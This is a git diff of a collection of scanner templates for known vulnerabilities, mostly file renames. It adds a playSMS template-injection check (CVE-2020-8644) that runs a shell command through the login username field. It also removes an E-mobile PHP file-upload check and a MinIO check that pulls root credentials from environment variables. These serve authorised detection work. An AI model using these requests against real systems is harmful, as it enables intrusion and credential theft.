+++ b/poc/cve/cve-2020-8644.yaml @@ -0,0 +1,58 @@ +id: CVE-2020-8644 + +info: + name: playSMS <1.4.3 - Remote Code Execution + author: dbrwsky + severity: critical + description: PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template. + reference: + - https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/ + - https://playsms.org/2020/02/05/playsms-1-4-3-has-been-released/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-8644 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-8644 + cwe-id: CWE-74 + tags: cve,cve2020,ssti,playsms,rce,unauth,kev + +requests: + - raw: + - | + GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + X-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password= + + cookie-reuse: true + redirects: true + max-redirects: 2 + extractors: + - type: xpath + name: csrf + part: body + attribute: value + internal: true + xpath: + - /html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - '4468-0202-EVC' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/07 \ No newline at end of file diff --git a/poc/cve/CVE-2020-8654.yaml b/poc/cve/cve-2020-8654(1).yaml similarity index 100% rename from poc/cve/CVE-2020-8654.yaml rename to poc/cve/cve-2020-8654(1).yaml diff --git a/poc/cve/CVE-2020-9490.yaml b/poc/cve/cve-2020-9490-5417.yaml similarity index 100% rename from poc/cve/CVE-2020-9490.yaml rename to poc/cve/cve-2020-9490-5417.yaml diff --git a/poc/cve/CVE-20200924a.yaml b/poc/cve/cve-20200924a(1).yaml similarity index 100% rename from poc/cve/CVE-20200924a.yaml rename to poc/cve/cve-20200924a(1).yaml diff --git a/poc/cve/CVE-2021-1499.yaml b/poc/cve/cve-2021-1499-5438.yaml similarity index 100% rename from poc/cve/CVE-2021-1499.yaml rename to poc/cve/cve-2021-1499-5438.yaml diff --git a/poc/cve/CVE-2021-20090.yaml b/poc/cve/cve-2021-20090-5451.yaml similarity index 100% rename from poc/cve/CVE-2021-20090.yaml rename to poc/cve/cve-2021-20090-5451.yaml diff --git a/poc/cve/CVE-2021-20114.yaml b/poc/cve/cve-2021-20114-5462.yaml similarity index 100% rename from poc/cve/CVE-2021-20114.yaml rename to poc/cve/cve-2021-20114-5462.yaml diff --git a/poc/cve/CVE-2021-20837.yaml b/poc/cve/cve-2021-20837-5480.yaml similarity index 100% rename from poc/cve/CVE-2021-20837.yaml rename to poc/cve/cve-2021-20837-5480.yaml diff --git a/poc/cve/CVE-2021-21315.yaml b/poc/cve/cve-2021-21315-5507.yaml similarity index 100% rename from poc/cve/CVE-2021-21315.yaml rename to poc/cve/cve-2021-21315-5507.yaml diff --git a/poc/cve/cve-2021-21799.yaml b/poc/cve/cve-2021-21799(1).yaml similarity index 100% rename from poc/cve/cve-2021-21799.yaml rename to poc/cve/cve-2021-21799(1).yaml diff --git a/poc/cve/cve-2021-21800(1).yaml b/poc/cve/cve-2021-21800.yaml similarity index 100% rename from poc/cve/cve-2021-21800(1).yaml rename to poc/cve/cve-2021-21800.yaml diff --git a/poc/cve/CVE-2021-21805.yaml b/poc/cve/cve-2021-21805.yaml similarity index 100% rename from poc/cve/CVE-2021-21805.yaml rename to poc/cve/cve-2021-21805.yaml diff --git a/poc/cve/CVE-2021-21816.yaml b/poc/cve/cve-2021-21816-5540.yaml similarity index 100% rename from poc/cve/CVE-2021-21816.yaml rename to poc/cve/cve-2021-21816-5540.yaml diff --git a/poc/cve/CVE-2021-22205.yaml b/poc/cve/cve-2021-22205-5596.yaml similarity index 100% rename from poc/cve/CVE-2021-22205.yaml rename to poc/cve/cve-2021-22205-5596.yaml diff --git a/poc/cve/cve-2021-22502(1).yaml b/poc/cve/cve-2021-22502.yaml similarity index 100% rename from poc/cve/cve-2021-22502(1).yaml rename to poc/cve/cve-2021-22502.yaml diff --git a/poc/cve/cve-2021-24488.yaml b/poc/cve/cve-2021-24488(1).yaml similarity index 100% rename from poc/cve/cve-2021-24488.yaml rename to poc/cve/cve-2021-24488(1).yaml diff --git a/poc/cve/cve-2021-26702.yaml b/poc/cve/cve-2021-26702(1).yaml similarity index 100% rename from poc/cve/cve-2021-26702.yaml rename to poc/cve/cve-2021-26702(1).yaml diff --git a/poc/cve/CVE-2021-27519.yaml b/poc/cve/cve-2021-27519-test.yaml similarity index 100% rename from poc/cve/CVE-2021-27519.yaml rename to poc/cve/cve-2021-27519-test.yaml diff --git a/poc/cve/cve-2021-27748(1).yaml b/poc/cve/cve-2021-27748.yaml similarity index 100% rename from poc/cve/cve-2021-27748(1).yaml rename to poc/cve/cve-2021-27748.yaml diff --git a/poc/cve/CVE-2021-31862.yaml b/poc/cve/cve-2021-31862-6119.yaml similarity index 100% rename from poc/cve/CVE-2021-31862.yaml rename to poc/cve/cve-2021-31862-6119.yaml diff --git a/poc/cve/cve-2021-3223(1).yaml b/poc/cve/cve-2021-3223.yaml similarity index 100% rename from poc/cve/cve-2021-3223(1).yaml rename to poc/cve/cve-2021-3223.yaml diff --git a/poc/cve/CVE-2021-33044.yaml b/poc/cve/cve-2021-33044-6164.yaml similarity index 100% rename from poc/cve/CVE-2021-33044.yaml rename to poc/cve/cve-2021-33044-6164.yaml diff --git a/poc/cve/CVE-2021-36260.yaml b/poc/cve/cve-2021-36260-6262.yaml similarity index 100% rename from poc/cve/CVE-2021-36260.yaml rename to poc/cve/cve-2021-36260-6262.yaml diff --git a/poc/cve/CVE-2021-36356.yaml b/poc/cve/cve-2021-36356(1).yaml similarity index 100% rename from poc/cve/CVE-2021-36356.yaml rename to poc/cve/cve-2021-36356(1).yaml diff --git a/poc/cve/CVE-2021-36450.yaml b/poc/cve/cve-2021-36450.yaml similarity index 100% rename from poc/cve/CVE-2021-36450.yaml rename to poc/cve/cve-2021-36450.yaml diff --git a/poc/cve/CVE-2021-36748.yaml b/poc/cve/cve-2021-36748-6273.yaml similarity index 100% rename from poc/cve/CVE-2021-36748.yaml rename to poc/cve/cve-2021-36748-6273.yaml diff --git a/poc/cve/CVE-2021-37859.yaml b/poc/cve/cve-2021-37859.yaml similarity index 100% rename from poc/cve/CVE-2021-37859.yaml rename to poc/cve/cve-2021-37859.yaml diff --git a/poc/cve/CVE-2021-38540.yaml b/poc/cve/cve-2021-38540-6301.yaml similarity index 100% rename from poc/cve/CVE-2021-38540.yaml rename to poc/cve/cve-2021-38540-6301.yaml diff --git a/poc/cve/cve-2021-42192(1).yaml b/poc/cve/cve-2021-42192.yaml similarity index 100% rename from poc/cve/cve-2021-42192(1).yaml rename to poc/cve/cve-2021-42192.yaml diff --git a/poc/cve/cve-2021-43798-grafana.yaml b/poc/cve/cve-2021-43798-6536.yaml similarity index 100% rename from poc/cve/cve-2021-43798-grafana.yaml rename to poc/cve/cve-2021-43798-6536.yaml diff --git a/poc/cve/cve-2021-44077(1).yaml b/poc/cve/cve-2021-44077.yaml similarity index 100% rename from poc/cve/cve-2021-44077(1).yaml rename to poc/cve/cve-2021-44077.yaml diff --git a/poc/cve/CVE-2021-44515.yaml b/poc/cve/cve-2021-44515.yaml similarity index 100% rename from poc/cve/CVE-2021-44515.yaml rename to poc/cve/cve-2021-44515.yaml diff --git a/poc/cve/CVE-2021-45380.yaml b/poc/cve/cve-2021-45380-6584.yaml similarity index 100% rename from poc/cve/CVE-2021-45380.yaml rename to poc/cve/cve-2021-45380-6584.yaml diff --git a/poc/cve/cve-2021-45428(1).yaml b/poc/cve/cve-2021-45428.yaml similarity index 100% rename from poc/cve/cve-2021-45428(1).yaml rename to poc/cve/cve-2021-45428.yaml diff --git a/poc/cve/CVE-2021-46422.yaml b/poc/cve/cve-2021-46422.yaml similarity index 100% rename from poc/cve/CVE-2021-46422.yaml rename to poc/cve/cve-2021-46422.yaml diff --git a/poc/cve/CVE-2021-46424.yaml b/poc/cve/cve-2021-46424.yaml similarity index 100% rename from poc/cve/CVE-2021-46424.yaml rename to poc/cve/cve-2021-46424.yaml diff --git a/poc/cve/cve-2022-0540.yaml b/poc/cve/cve-2022-0540(1).yaml similarity index 100% rename from poc/cve/cve-2022-0540.yaml rename to poc/cve/cve-2022-0540(1).yaml diff --git a/poc/cve/CVE-2022-0543.yaml b/poc/cve/cve-2022-0543.yaml similarity index 100% rename from poc/cve/CVE-2022-0543.yaml rename to poc/cve/cve-2022-0543.yaml diff --git a/poc/cve/CVE-2022-0660.yaml b/poc/cve/cve-2022-0660(1).yaml similarity index 100% rename from poc/cve/CVE-2022-0660.yaml rename to poc/cve/cve-2022-0660(1).yaml diff --git a/poc/cve/cve-2022-0776(1).yaml b/poc/cve/cve-2022-0776.yaml similarity index 100% rename from poc/cve/cve-2022-0776(1).yaml rename to poc/cve/cve-2022-0776.yaml diff --git a/poc/cve/CVE-2022-0870.yaml b/poc/cve/cve-2022-0870.yaml similarity index 100% rename from poc/cve/CVE-2022-0870.yaml rename to poc/cve/cve-2022-0870.yaml diff --git a/poc/cve/CVE-2022-0921.yaml b/poc/cve/cve-2022-0921.yaml similarity index 100% rename from poc/cve/CVE-2022-0921.yaml rename to poc/cve/cve-2022-0921.yaml diff --git a/poc/cve/cve-2022-1713.yaml b/poc/cve/cve-2022-1713(1).yaml similarity index 100% rename from poc/cve/cve-2022-1713.yaml rename to poc/cve/cve-2022-1713(1).yaml diff --git a/poc/cve/CVE-2022-21371.yaml b/poc/cve/cve-2022-21371-6659.yaml similarity index 100% rename from poc/cve/CVE-2022-21371.yaml rename to poc/cve/cve-2022-21371-6659.yaml diff --git a/poc/cve/cve-2022-2290(1).yaml b/poc/cve/cve-2022-2290.yaml similarity index 100% rename from poc/cve/cve-2022-2290(1).yaml rename to poc/cve/cve-2022-2290.yaml diff --git a/poc/cve/CVE-2022-24181.yaml b/poc/cve/cve-2022-24181(1).yaml similarity index 100% rename from poc/cve/CVE-2022-24181.yaml rename to poc/cve/cve-2022-24181(1).yaml diff --git a/poc/cve/cve-2022-24681.yaml b/poc/cve/cve-2022-24681(1).yaml similarity index 100% rename from poc/cve/cve-2022-24681.yaml rename to poc/cve/cve-2022-24681(1).yaml diff --git a/poc/cve/cve-2022-24856.yaml b/poc/cve/cve-2022-24856(1).yaml similarity index 100% rename from poc/cve/cve-2022-24856.yaml rename to poc/cve/cve-2022-24856(1).yaml diff --git a/poc/cve/CVE-2022-2486.yaml b/poc/cve/cve-2022-2486.yaml similarity index 100% rename from poc/cve/CVE-2022-2486.yaml rename to poc/cve/cve-2022-2486.yaml diff --git a/poc/cve/cve-2022-2488(1).yaml b/poc/cve/cve-2022-2488.yaml similarity index 100% rename from poc/cve/cve-2022-2488(1).yaml rename to poc/cve/cve-2022-2488.yaml diff --git a/poc/cve/cve-2022-26135(1).yaml b/poc/cve/cve-2022-26135.yaml similarity index 100% rename from poc/cve/cve-2022-26135(1).yaml rename to poc/cve/cve-2022-26135.yaml diff --git a/poc/cve/CVE-2022-26138.yaml b/poc/cve/cve-2022-26138(1).yaml similarity index 100% rename from poc/cve/CVE-2022-26138.yaml rename to poc/cve/cve-2022-26138(1).yaml diff --git a/poc/cve/cve-2022-26564(1).yaml b/poc/cve/cve-2022-26564.yaml similarity index 100% rename from poc/cve/cve-2022-26564(1).yaml rename to poc/cve/cve-2022-26564.yaml diff --git a/poc/cve/cve-2022-26960(1).yaml b/poc/cve/cve-2022-26960.yaml similarity index 100% rename from poc/cve/cve-2022-26960(1).yaml rename to poc/cve/cve-2022-26960.yaml diff --git a/poc/cve/CVE-2022-28079.yaml b/poc/cve/cve-2022-28079.yaml similarity index 100% rename from poc/cve/CVE-2022-28079.yaml rename to poc/cve/cve-2022-28079.yaml diff --git a/poc/cve/CVE-2022-29299.yaml b/poc/cve/cve-2022-29299.yaml similarity index 100% rename from poc/cve/CVE-2022-29299.yaml rename to poc/cve/cve-2022-29299.yaml diff --git a/poc/cve/cve-2022-29301.yaml b/poc/cve/cve-2022-29301(1).yaml similarity index 100% rename from poc/cve/cve-2022-29301.yaml rename to poc/cve/cve-2022-29301(1).yaml diff --git a/poc/cve/cve-2022-29383(1).yaml b/poc/cve/cve-2022-29383.yaml similarity index 100% rename from poc/cve/cve-2022-29383(1).yaml rename to poc/cve/cve-2022-29383.yaml diff --git a/poc/cve/CVE-2022-29548.yaml b/poc/cve/cve-2022-29548.yaml similarity index 100% rename from poc/cve/CVE-2022-29548.yaml rename to poc/cve/cve-2022-29548.yaml diff --git a/poc/cve/cve-2022-31268(1).yaml b/poc/cve/cve-2022-31268.yaml similarity index 100% rename from poc/cve/cve-2022-31268(1).yaml rename to poc/cve/cve-2022-31268.yaml diff --git a/poc/cve/CVE-2022-31793.yaml b/poc/cve/cve-2022-31793(1).yaml similarity index 100% rename from poc/cve/CVE-2022-31793.yaml rename to poc/cve/cve-2022-31793(1).yaml diff --git a/poc/cve/cve-2022-32024.yaml b/poc/cve/cve-2022-32024(1).yaml similarity index 100% rename from poc/cve/cve-2022-32024.yaml rename to poc/cve/cve-2022-32024(1).yaml diff --git a/poc/cve/cve-2022-32026.yaml b/poc/cve/cve-2022-32026(1).yaml similarity index 100% rename from poc/cve/cve-2022-32026.yaml rename to poc/cve/cve-2022-32026(1).yaml diff --git a/poc/cve/CVE-2022-32028.yaml b/poc/cve/cve-2022-32028(1).yaml similarity index 100% rename from poc/cve/CVE-2022-32028.yaml rename to poc/cve/cve-2022-32028(1).yaml diff --git a/poc/cve/CVE-2022-33119.yaml b/poc/cve/cve-2022-33119(1).yaml similarity index 100% rename from poc/cve/CVE-2022-33119.yaml rename to poc/cve/cve-2022-33119(1).yaml diff --git a/poc/cve/cve-2022-34048(1).yaml b/poc/cve/cve-2022-34048.yaml similarity index 100% rename from poc/cve/cve-2022-34048(1).yaml rename to poc/cve/cve-2022-34048.yaml diff --git a/poc/cve/CVE-2022-34049.yaml b/poc/cve/cve-2022-34049(1).yaml similarity index 100% rename from poc/cve/CVE-2022-34049.yaml rename to poc/cve/cve-2022-34049(1).yaml diff --git a/poc/cve/cve-2022-36883(1).yaml b/poc/cve/cve-2022-36883.yaml similarity index 100% rename from poc/cve/cve-2022-36883(1).yaml rename to poc/cve/cve-2022-36883.yaml diff --git a/poc/cve/cve-2023-2523.yaml b/poc/cve/cve-2023-2523.yaml deleted file mode 100644 index 4b2a6d7baf..0000000000 --- a/poc/cve/cve-2023-2523.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: cve-2023-2523 -info: - name: cve-2023-2523 - author: weehhd - severity: high - description: https://blog.csdn.net/qq_41904294/article/details/130832416 - reference: - - https:// - tags: tags -http: - - raw: - - "POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1\nHost:\ - \ {{Hostname}}\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows\ - \ NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0\ - \ Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\n\ - Accept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-CN;q=0.8,en;q=0.7\n\ - Cookie: PHPSESSID=c4a1f7ccafd44c06a73b00c0149d2f54\nConnection: close\nContent-Type:multipart/form-data;\ - \ boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt \nContent-Length: 344\n\n\ - ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition:form-data; name=\"\ - upload_quwan\"; filename=\"1.php.\"\nContent-Type:image/jpeg\n\n\n\ - ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt\nContent-Disposition:form-data; name=\"\ - file\"; filename=\"\"\nContent-Type:application/octet-stream\n\n\n------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 1.php - - type: word - part: header - words: - - HTTP/1.1 200 OK diff --git a/poc/cve/cve-2023-28432.yaml b/poc/cve/cve-2023-28432.yaml deleted file mode 100644 index 19839d49a6..0000000000 --- a/poc/cve/cve-2023-28432.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: CVE-2023-28432 - -info: - name: MinIO Cluster Deployment - Information Disclosure - author: Mr-xn - severity: high - description: | - MinIO is susceptible to information disclosure. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. All users of distributed deployment are impacted. - impact: | - An attacker can gain unauthorized access to sensitive information stored in the MinIO cluster. - remediation: All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z. - reference: - - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q - - https://github.com/minio/minio/pull/16853/files - - https://github.com/golang/vulndb/issues/1667 - - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json - - https://nvd.nist.gov/vuln/detail/CVE-2023-28432 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2023-28432 - cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.14173 - epss-percentile: 0.95219 - cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 1 - vendor: minio - product: minio - shodan-query: title:"Minio Console" - fofa-query: app="Minio" - tags: cve,cve2023,minio,console,exposure,kev - -http: - - raw: - - |+ - POST /minio/bootstrap/v1/verify HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '"MINIO_ROOT_PASSWORD":' - - '"MINIO_ROOT_USER":' - - '"MinioEnv":' - condition: or - - - type: word - part: header - words: - - 'text/plain' - - - type: status - status: - - 200 -# digest: 4a0a00473045022100cc34538c0cf40fb3489d8f091c41bcf45f66c43266a4c6a2136aef40acbe67b702200d93d6082e5e272bc01f1e8222ec9521c32be40f912837b32aa6c0e6dcd75a2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/resin-cnnvd-200705-315-9867.yaml b/poc/cve/resin-cnnvd-200705-315.yaml similarity index 100% rename from poc/cve/resin-cnnvd-200705-315-9867.yaml rename to poc/cve/resin-cnnvd-200705-315.yaml diff --git a/poc/debug/android-debug-database-exposed-312.yaml b/poc/debug/android-debug-database-exposed.yaml similarity index 100% rename from poc/debug/android-debug-database-exposed-312.yaml rename to poc/debug/android-debug-database-exposed.yaml diff --git a/poc/debug/symfony-debugmode.yaml b/poc/debug/symfony-debugmode-10623.yaml similarity index 100% rename from poc/debug/symfony-debugmode.yaml rename to poc/debug/symfony-debugmode-10623.yaml diff --git a/poc/default/kingsoft-default-login.yaml b/poc/default/Kingsoft-default-login.yaml similarity index 100% rename from poc/default/kingsoft-default-login.yaml rename to poc/default/Kingsoft-default-login.yaml diff --git a/poc/default/aem-default-get-servlet-138.yaml b/poc/default/aem-default-get-servlet.yaml similarity index 100% rename from poc/default/aem-default-get-servlet-138.yaml rename to poc/default/aem-default-get-servlet.yaml diff --git a/poc/default/default-apache-test-all-6813.yaml b/poc/default/default-apache-test-all.yaml similarity index 100% rename from poc/default/default-apache-test-all-6813.yaml rename to poc/default/default-apache-test-all.yaml diff --git a/poc/default/default-apache2-ubuntu-page.yaml b/poc/default/default-apache2-ubuntu-page-6808.yaml similarity index 100% rename from poc/default/default-apache2-ubuntu-page.yaml rename to poc/default/default-apache2-ubuntu-page-6808.yaml diff --git a/poc/default/default-django-page-6840.yaml b/poc/default/default-django-page.yaml similarity index 100% rename from poc/default/default-django-page-6840.yaml rename to poc/default/default-django-page.yaml diff --git a/poc/default/default-iis7-page.yaml b/poc/default/default-iis7-page-6858.yaml similarity index 100% rename from poc/default/default-iis7-page.yaml rename to poc/default/default-iis7-page-6858.yaml diff --git a/poc/default/default-lighttpd-page.yaml b/poc/default/default-lighttpd-page-6866.yaml similarity index 100% rename from poc/default/default-lighttpd-page.yaml rename to poc/default/default-lighttpd-page-6866.yaml diff --git a/poc/default/default-plesk-page.yaml b/poc/default/default-plesk-page-6898.yaml similarity index 100% rename from poc/default/default-plesk-page.yaml rename to poc/default/default-plesk-page-6898.yaml diff --git a/poc/default/dell-idrac9-default-login-6934.yaml b/poc/default/dell-idrac9-default-login.yaml similarity index 100% rename from poc/default/dell-idrac9-default-login-6934.yaml rename to poc/default/dell-idrac9-default-login.yaml diff --git a/poc/default/gophish-default-login-7794.yaml b/poc/default/gophish-default-login.yaml similarity index 100% rename from poc/default/gophish-default-login-7794.yaml rename to poc/default/gophish-default-login.yaml diff --git a/poc/default/JeeSite-default-login.yaml b/poc/default/jeesite-default-login.yaml similarity index 100% rename from poc/default/JeeSite-default-login.yaml rename to poc/default/jeesite-default-login.yaml diff --git a/poc/default/mofi4500-default-login.yaml b/poc/default/mofi4500-default-login-8914.yaml similarity index 100% rename from poc/default/mofi4500-default-login.yaml rename to poc/default/mofi4500-default-login-8914.yaml diff --git a/poc/default/nexus-default-login.yaml b/poc/default/nexus-default-login-9089.yaml similarity index 100% rename from poc/default/nexus-default-login.yaml rename to poc/default/nexus-default-login-9089.yaml diff --git a/poc/default/rancher-default-login.yaml b/poc/default/rancher-default-login-9816.yaml similarity index 100% rename from poc/default/rancher-default-login.yaml rename to poc/default/rancher-default-login-9816.yaml diff --git a/poc/default/rockmongo-default-login.yaml b/poc/default/rockmongo-default-login-9900.yaml similarity index 100% rename from poc/default/rockmongo-default-login.yaml rename to poc/default/rockmongo-default-login-9900.yaml diff --git a/poc/default/smartsense-default-login.yaml b/poc/default/smartsense-default-login-10331.yaml similarity index 100% rename from poc/default/smartsense-default-login.yaml rename to poc/default/smartsense-default-login-10331.yaml diff --git a/poc/default/solarwinds-default-login.yaml b/poc/default/solarwinds-default-login-10356.yaml similarity index 100% rename from poc/default/solarwinds-default-login.yaml rename to poc/default/solarwinds-default-login-10356.yaml diff --git a/poc/default/versa-default-login.yaml b/poc/default/versa-default-login-11004.yaml similarity index 100% rename from poc/default/versa-default-login.yaml rename to poc/default/versa-default-login-11004.yaml diff --git a/poc/default/xerox7-default-login-11680.yaml b/poc/default/xerox7-default-login.yaml similarity index 100% rename from poc/default/xerox7-default-login-11680.yaml rename to poc/default/xerox7-default-login.yaml diff --git a/poc/default/zabbix-default-login-11763.yaml b/poc/default/zabbix-default-login.yaml similarity index 100% rename from poc/default/zabbix-default-login-11763.yaml rename to poc/default/zabbix-default-login.yaml diff --git a/poc/detect/aem-detection-146.yaml b/poc/detect/aem-detection.yaml similarity index 100% rename from poc/detect/aem-detection-146.yaml rename to poc/detect/aem-detection.yaml diff --git a/poc/detect/alfresco-detect-260.yaml b/poc/detect/alfresco-detect.yaml similarity index 100% rename from poc/detect/alfresco-detect-260.yaml rename to poc/detect/alfresco-detect.yaml diff --git a/poc/detect/apache-dubbo-detect-351.yaml b/poc/detect/apache-dubbo-detect.yaml similarity index 100% rename from poc/detect/apache-dubbo-detect-351.yaml rename to poc/detect/apache-dubbo-detect.yaml diff --git a/poc/detect/apollo-server-detect.yaml b/poc/detect/apollo-server-detect-522.yaml similarity index 100% rename from poc/detect/apollo-server-detect.yaml rename to poc/detect/apollo-server-detect-522.yaml diff --git a/poc/detect/artica-web-proxy-detect-545.yaml b/poc/detect/artica-web-proxy-detect.yaml similarity index 100% rename from poc/detect/artica-web-proxy-detect-545.yaml rename to poc/detect/artica-web-proxy-detect.yaml diff --git a/poc/detect/aviatrix-detect-606.yaml b/poc/detect/aviatrix-detect.yaml similarity index 100% rename from poc/detect/aviatrix-detect-606.yaml rename to poc/detect/aviatrix-detect.yaml diff --git a/poc/detect/bigbluebutton-detect-723.yaml b/poc/detect/bigbluebutton-detect.yaml similarity index 100% rename from poc/detect/bigbluebutton-detect-723.yaml rename to poc/detect/bigbluebutton-detect.yaml diff --git a/poc/detect/citrix-adc-gateway-detect-981.yaml b/poc/detect/citrix-adc-gateway-detect.yaml similarity index 100% rename from poc/detect/citrix-adc-gateway-detect-981.yaml rename to poc/detect/citrix-adc-gateway-detect.yaml diff --git a/poc/detect/cockpit-detect-1127.yaml b/poc/detect/cockpit-detect.yaml similarity index 100% rename from poc/detect/cockpit-detect-1127.yaml rename to poc/detect/cockpit-detect.yaml diff --git a/poc/detect/cofense-vision-detection.yml b/poc/detect/cofense-vision-detection.yaml similarity index 100% rename from poc/detect/cofense-vision-detection.yml rename to poc/detect/cofense-vision-detection.yaml diff --git a/poc/detect/confluence-detect-1189.yaml b/poc/detect/confluence-detect.yaml similarity index 100% rename from poc/detect/confluence-detect-1189.yaml rename to poc/detect/confluence-detect.yaml diff --git a/poc/detect/craft-cms-detect-1247.yaml b/poc/detect/craft-cms-detect.yaml similarity index 100% rename from poc/detect/craft-cms-detect-1247.yaml rename to poc/detect/craft-cms-detect.yaml diff --git a/poc/detect/crush-ftp-detect.yaml b/poc/detect/crush-ftp-detect-1272.yaml similarity index 100% rename from poc/detect/crush-ftp-detect.yaml rename to poc/detect/crush-ftp-detect-1272.yaml diff --git a/poc/detect/csrfguard-detect.yaml b/poc/detect/csrfguard-detect-1290.yaml similarity index 100% rename from poc/detect/csrfguard-detect.yaml rename to poc/detect/csrfguard-detect-1290.yaml diff --git a/poc/detect/dell-idrac8-detect-6927.yaml b/poc/detect/dell-idrac8-detect.yaml similarity index 100% rename from poc/detect/dell-idrac8-detect-6927.yaml rename to poc/detect/dell-idrac8-detect.yaml diff --git a/poc/detect/detect-addpac-voip-gateway-6964.yaml b/poc/detect/detect-addpac-voip-gateway.yaml similarity index 100% rename from poc/detect/detect-addpac-voip-gateway-6964.yaml rename to poc/detect/detect-addpac-voip-gateway.yaml diff --git a/poc/detect/detect-options-method.yaml b/poc/detect/detect-options-method-6978.yaml similarity index 100% rename from poc/detect/detect-options-method.yaml rename to poc/detect/detect-options-method-6978.yaml diff --git a/poc/detect/dns-waf-detect.yaml b/poc/detect/dns-waf-detect-7052.yaml similarity index 100% rename from poc/detect/dns-waf-detect.yaml rename to poc/detect/dns-waf-detect-7052.yaml diff --git a/poc/detect/dolibarr-detect-7071.yaml b/poc/detect/dolibarr-detect-7069.yaml similarity index 100% rename from poc/detect/dolibarr-detect-7071.yaml rename to poc/detect/dolibarr-detect-7069.yaml diff --git a/poc/detect/fanruanoa-detect-7392.yaml b/poc/detect/fanruanoa-detect.yaml similarity index 100% rename from poc/detect/fanruanoa-detect-7392.yaml rename to poc/detect/fanruanoa-detect.yaml diff --git a/poc/detect/fanruanoa2012-detect.yaml b/poc/detect/fanruanoa2012-detect-7388.yaml similarity index 100% rename from poc/detect/fanruanoa2012-detect.yaml rename to poc/detect/fanruanoa2012-detect-7388.yaml diff --git a/poc/detect/fatpipe-mpvpn-detect-7437.yaml b/poc/detect/fatpipe-mpvpn-detect.yaml similarity index 100% rename from poc/detect/fatpipe-mpvpn-detect-7437.yaml rename to poc/detect/fatpipe-mpvpn-detect.yaml diff --git a/poc/detect/froxlor-detect-7552.yaml b/poc/detect/froxlor-detect-7553.yaml similarity index 100% rename from poc/detect/froxlor-detect-7552.yaml rename to poc/detect/froxlor-detect-7553.yaml diff --git a/poc/detect/gnuboard-detect.yaml b/poc/detect/gnuboard-detect-7742.yaml similarity index 100% rename from poc/detect/gnuboard-detect.yaml rename to poc/detect/gnuboard-detect-7742.yaml diff --git a/poc/detect/gunicorn-detect.yaml b/poc/detect/gunicorn-detect-7863.yaml similarity index 100% rename from poc/detect/gunicorn-detect.yaml rename to poc/detect/gunicorn-detect-7863.yaml diff --git a/poc/detect/hp-blade-admin-detect-8005.yaml b/poc/detect/hp-blade-admin-detect-8004.yaml similarity index 100% rename from poc/detect/hp-blade-admin-detect-8005.yaml rename to poc/detect/hp-blade-admin-detect-8004.yaml diff --git a/poc/detect/ibm-sterling-detect.yaml b/poc/detect/ibm-sterling-detect-8122.yaml similarity index 100% rename from poc/detect/ibm-sterling-detect.yaml rename to poc/detect/ibm-sterling-detect-8122.yaml diff --git a/poc/detect/ilo-detect-8155.yaml b/poc/detect/ilo-detect-8156.yaml similarity index 100% rename from poc/detect/ilo-detect-8155.yaml rename to poc/detect/ilo-detect-8156.yaml diff --git a/poc/detect/nexus-detect-9094.yaml b/poc/detect/nexus-detect.yaml similarity index 100% rename from poc/detect/nexus-detect-9094.yaml rename to poc/detect/nexus-detect.yaml diff --git a/poc/detect/seeddms-detect-10131.yaml b/poc/detect/seeddms-detect.yaml similarity index 100% rename from poc/detect/seeddms-detect-10131.yaml rename to poc/detect/seeddms-detect.yaml diff --git a/poc/detect/web-ftp-detect.yaml b/poc/detect/web-ftp-detect-11137.yaml similarity index 100% rename from poc/detect/web-ftp-detect.yaml rename to poc/detect/web-ftp-detect-11137.yaml diff --git a/poc/detect/wowza-streaming-detect.yaml b/poc/detect/wowza-streaming-detect.yaml deleted file mode 100644 index 474f52504a..0000000000 --- a/poc/detect/wowza-streaming-detect.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: wowza-streaming-engine -info: - name: Wowza Streaming Engine - author: dhiyaneshDK - severity: info - metadata: - shodan-query: 